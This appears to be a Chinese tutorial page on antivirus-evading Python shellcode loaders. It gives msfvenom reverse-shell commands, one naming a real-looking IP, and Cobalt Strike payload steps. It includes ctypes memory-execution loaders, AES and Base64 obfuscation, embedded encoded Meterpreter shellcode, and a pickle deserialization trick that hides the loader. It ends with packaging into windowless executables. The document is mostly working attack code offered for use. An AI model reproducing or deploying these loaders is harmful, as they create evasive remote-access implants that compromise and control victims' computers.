您现在的位置是：首页 >技术教程 >Python-shellcode免杀分离网站首页技术教程

#Python-原生态-MSF&CS&生成&执行代码

MSF-payload：msfvenom -p windows/meterpreter/reverse_tcp lhost=X.X.X.X lport=6688 -f c

CS-payload：

攻击--生成后门--payload生成器--选择监听器和输出格式为C语言

python 3.10-32位，注意python解释器一定要切换为32位

import ctypes
shellcode=b""
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

将shellcode填入，run即可上线，payload均为32位

#Python-混淆加密-Base64&AES&反序列化等

python 3.10-32位，注意python解释器一定要切换为32位

BASE64加密

import base64
shellcode=b""
shellcode=base64.b64encode(shellcode)
shellcode=base64.b64decode(shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

AES+Base64免杀

python脚本加密，发布版进行解密

采用base64加密的MSFpayload：

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=43.143.231.203 lport=6699 -f c

1、加密代码

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64

# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('' * add)
    return text.encode('utf-8')

# 加密函数
def encrypt(text):
    key = '9999999999999999'.encode('utf-8')
    mode = AES.MODE_CBC
    iv = b'qqqqqqqqqqqqqqqq'
    text = add_to_16(text)
    cryptos = AES.new(key, mode, iv)
    cipher_text = cryptos.encrypt(text)
    #print(base64.b64decode(cipher_text))
    # 因为AES加密后的字符串不一定是ascii字符集的，输出保存可能存在问题，所以这里转为16进制字符串
    return b2a_hex(cipher_text)
if __name__ == '__main__':

    s='''x2fx4fx69x50x41x41x41x41x59x49x6ex6cx4dx64x4ax6bx69x31x49x77x69x31x49x4dx69x31x49x55x4dx66x38x50x74x30x6fx6dx69x33x49x6fx4dx63x43x73x50x47x46x38x41x69x77x67x77x63x38x4ex41x63x64x4ax64x65x39x53x56x34x74x53x45x49x74x43x50x41x48x51x69x30x42x34x68x63x42x30x54x41x48x51x69x31x67x67x41x64x4ex51x69x30x67x59x68x63x6cx30x50x44x48x2fx53x59x73x30x69x77x48x57x4dx63x44x42x7ax77x32x73x41x63x63x34x34x48x58x30x41x33x33x34x4fx33x30x6bx64x65x42x59x69x31x67x6bx41x64x4ex6dx69x77x78x4cx69x31x67x63x41x64x4fx4cx42x49x73x42x30x49x6cx45x4ax43x52x62x57x32x46x5ax57x6cx48x2fx34x46x68x66x57x6fx73x53x36x59x44x2fx2fx2fx39x64x61x44x4dx79x41x41x42x6fx64x33x4dx79x58x31x52x6fx54x48x63x6dx42x34x6ex6fx2fx39x43x34x6bx41x45x41x41x43x6ex45x56x46x42x6fx4bx59x42x72x41x50x2fx56x61x67x70x6fx4bx34x2fx6ex79x32x67x43x41x42x6fx72x69x65x5ax51x55x46x42x51x51x46x42x41x55x47x6ax71x44x39x2fx67x2fx39x57x58x61x68x42x57x56x32x69x5ax70x58x52x68x2fx39x57x46x77x48x51x4bx2fx30x34x49x64x65x7ax6fx5ax77x41x41x41x47x6fx41x61x67x52x57x56x32x67x43x32x63x68x66x2fx39x57x44x2bx41x42x2bx4ex6fx73x32x61x6bx42x6fx41x42x41x41x41x46x5ax71x41x47x68x59x70x46x50x6cx2fx39x57x54x55x32x6fx41x56x6cx4ex58x61x41x4cx5ax79x46x2fx2fx31x59x50x34x41x48x30x6fx57x47x67x41x51x41x41x41x61x67x42x51x61x41x73x76x44x7ax44x2fx31x56x64x6fx64x57x35x4ex59x66x2fx56x58x6cx37x2fx44x43x51x50x68x58x44x2fx2fx2fx2fx70x6dx2fx2fx2fx2fx77x48x44x4bx63x5ax31x77x63x4fx37x38x4cx57x69x56x6dx6fx41x55x2fx2fx56'''
    e = encrypt(s)
    print(e)

2.打包生成exe

from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes,base64

# 如果text不足16位的倍数就用空格补足为16位
def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('' * add)
    return text.encode('utf-8')

# 解密后，去掉补足的空格用strip() 去掉
def decrypt(text):
    key = '9999999999999999'.encode('utf-8')
    iv = b'qqqqqqqqqqqqqqqq'
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(a2b_hex(text))
    shellcode=bytes.decode(plain_text).rstrip('')
    return shellcode

def zhixing(shellcode):
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

if __name__ == '__main__':
    e=b'33f749a8505ca4735580904332883c2af54f80ec86d18ef7a394c40e880ded215a754d1ace5e7a830d3e3e47e9d6823872c11c0e504fd4d4b8b327090bbf2401b4df090d6818cad9b0df97f0ab48105f3db9167049bba97ef05cda4167a0fdf88e20d92dce5251c4dcdd9f87f111d17e9864f9a3fefb8abfb1dc7bfadb61600200b1852e8509e50305a36f05ce0eae405a4e193104efa9b4fb91561b912aecf1e036c3b646b4a9ed39a5e1fe599b3b47f6a27502b63ab256053ba47a25b8d8ad8faab09279da78e0dc85a45706db2c359d04fc4256da36a81150eb2fd46d134a0b9efa5987b8eaa5abbff4c7baa44141a416d4506ca6e6d3cdf63e82c0bfcfd28c84d1fa5dddc61b6d3f1b34e20bd30e0875fa1d9f6a522e88de1aa2b3b6e9b39f32c962bf47276fe448b5ddd9c8229f5660860eb6a0a3a48e5d3d28a17851f29146209cfe84c6fcbe08cc5a10e5cfc1d36419acad929c217ff8c82546a250d1a0db63b0a87d49c141bdace0299b05f729968011ae862a30bd05f483e9dcdd789b459957a7f80a472bc2474d2f5bd40a43a0e8c24c89db291e7d2644d3f05f54c0fbaab541e49b1338ba810afa0b691b457cce89b568c26f9b9369584ab004539ba52c0423aac6db0a2823f79ff03435f57052734d66268239564c4aafaf2df5'
    d = decrypt(e)  # 解密
    d=base64.b64decode(d)
    zhixing(d)

shellcode反序列化

1、加密版本

import pickle
import base64

shellcode = '''
import ctypes,base64
encode_shellcode=b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWi+FQAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///9Eb2dDc0RvZ0NzLmpzAEVmmARqXGftc6QZO2ctD4qrxgX2XyEZGtitNVLYDaZD3kpn7dC7tRhMsdtxvR7bnUNgHtAjXIBUOLUIl1Ffc7ZcAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMSkgQXBwbGVXZWJLaXQvNTM1LjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMuMC43ODIuNDEgU2FmYXJpLzUzNS4xIFFRQnJvd3Nlci82LjkuMTEwNzkuMjAxDQoAf2Y9DCnpWg90GY9woxT9rYp0mojUWe0M5wQNVNBKDuJ0EjPKhuj+qhNINbdrOj62nMlX6z2cPP4Gvty5Rr3GSfCFBTgjULzFh71+Y4jpy5M8WRTxwtAeAFyXOEUgbyGm7UcRCE3AVDtjsXgI/Xq8OZIkh1rlnHODK6cQ2IcoIPiYX/3VZLE6x8iPmlPZ1KwI1xAg08S0X2joC6oUEpjWXMpEmUL4iQBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//OC4xMzAuMTE5LjEzNwAF9eEA'
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''
//生成对象A的序列化数据，并base64编码
//对象A调用魔术方法进行exec shellcode
class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))


ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)

2.发布版本

import base64,pickle,ctypes
shellcode=b'gASV0QUAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFiyBQAACmltcG9ydCBjdHlwZXMsYmFzZTY0CmVuY29kZV9zaGVsbGNvZGU9YicvT2lKQUFBQVlJbmxNZEpraTFJd2kxSU1pMUlVaTNJb0Q3ZEtKakgvTWNDc1BHRjhBaXdnd2M4TkFjZmk4RkpYaTFJUWkwSThBZENMUUhpRndIUktBZEJRaTBnWWkxZ2dBZFBqUEVtTE5Jc0IxakgvTWNDc3djOE5BY2M0NEhYMEEzMzRPMzBrZGVKWWkxZ2tBZE5taXd4TGkxZ2NBZE9MQklzQjBJbEVKQ1JiVzJGWldsSC80RmhmV29zUzY0WmRhRzVsZEFCb2QybHVhVlJvVEhjbUIvL1ZNZjlYVjFkWFYyZzZWbm1uLzlYcGhBQUFBRnN4eVZGUmFnTlJVV2krRlFBQVUxQm9WNG1meHYvVjYzQmJNZEpTYUFBQ1FJUlNVbEpUVWxCbzYxVXVPLy9WaWNhRHcxQXgvMWRYYXY5VFZtZ3RCaGg3LzlXRndBK0V3d0VBQURIL2hmWjBCSW41Nndsb3FzWGlYZi9WaWNGb1JTRmVNZi9WTWY5WGFnZFJWbEJvdDFmZ0MvL1Z2d0F2QUFBNXgzUzNNZi9wa1FFQUFPbkpBUUFBNkl2Ly8vOUViMmREYzBSdlowTnpMbXB6QUVWbW1BUnFYR2Z0YzZRWk8yY3RENHFyeGdYMlh5RVpHdGl0TlZMWURhWkQza3BuN2RDN3RSaE1zZHR4dlI3Ym5VTmdIdEFqWElCVU9MVUlsMUZmYzdaY0FGVnpaWEl0UVdkbGJuUTZJRTF2ZW1sc2JHRXZOUzR3SUNoWGFXNWtiM2R6SUU1VUlEWXVNU2tnUVhCd2JHVlhaV0pMYVhRdk5UTTFMakVnS0V0SVZFMU1MQ0JzYVd0bElFZGxZMnR2S1NCRGFISnZiV1V2TVRNdU1DNDNPREl1TkRFZ1UyRm1ZWEpwTHpVek5TNHhJRkZSUW5KdmQzTmxjaTgyTGprdU1URXdOemt1TWpBeERRb0FmMlk5RENucFdnOTBHWTl3b3hUOXJZcDBtb2pVV2UwTTV3UU5WTkJLRHVKMEVqUEtodWorcWhOSU5iZHJPajYybk1sWDZ6MmNQUDRHdnR5NVJyM0dTZkNGQlRnalVMekZoNzErWTRqcHk1TThXUlR4d3RBZUFGeVhPRVVnYnlHbTdVY1JDRTNBVkR0anNYZ0kvWHE4T1pJa2gxcmxuSE9ESzZjUTJJY29JUGlZWC8zVlpMRTZ4OGlQbWxQWjFLd0kxeEFnMDhTMFgyam9DNm9VRXBqV1hNcEVtVUw0aVFCbzhMV2lWdi9WYWtCb0FCQUFBR2dBQUVBQVYyaFlwRlBsLzlXVHVRQUFBQUFCMlZGVGllZFhhQUFnQUFCVFZtZ1Nsb25pLzlXRndIVEdpd2NCdzRYQWRlVll3K2lwL2YvL09DNHhNekF1TVRFNUxqRXpOd0FGOWVFQScKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShlbmNvZGVfc2hlbGxjb2RlKQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEplIWUUpQu'
pickle.loads(base64.b64decode(shellcode))

pickle.loads函数执行时会默认执行魔术方法reduce

#Python-打包器选择-Pyinstall&Py2exe&Nuitka

1、pyinstaller

-F, –onefile 打包一个单个文件，如果你的代码都写在一个.py文件的话，可以用这个，如果是多个.py文件就别用

-D, –onedir 打包多个文件，在dist中生成很多依赖文件，适合以框架形式编写工具代码，我个人比较推荐这样，代码易于维护

-K, –tk 在部署时包含 TCL/TK

-a, –ascii 不包含编码.在支持Unicode的python版本上默认包含所有的编码.

-d, –debug 产生debug版本的可执行文件

-w,–windowed,–noconsole 使用Windows子系统执行.当程序启动的时候不会打开命令行(只对Windows有效)

-c,–nowindowed,–console 使用控制台子系统执行(默认)(只对Windows有效)

使用：pyinstaller -F test.py --noconsole

2、py2exe

安装：pip install py2exe

打包：python setup.py py2exe

3、Nuitka（C:UsersAdministratorAppDataLocalProgramsPythonPython310-32Scripts）

安装：pip install Nuitka

使用：nuitka --mingw64 --standalone --show-memory --show-progress --nofollow-imports --follow-import-to=utils,src --output-dir=out 108.py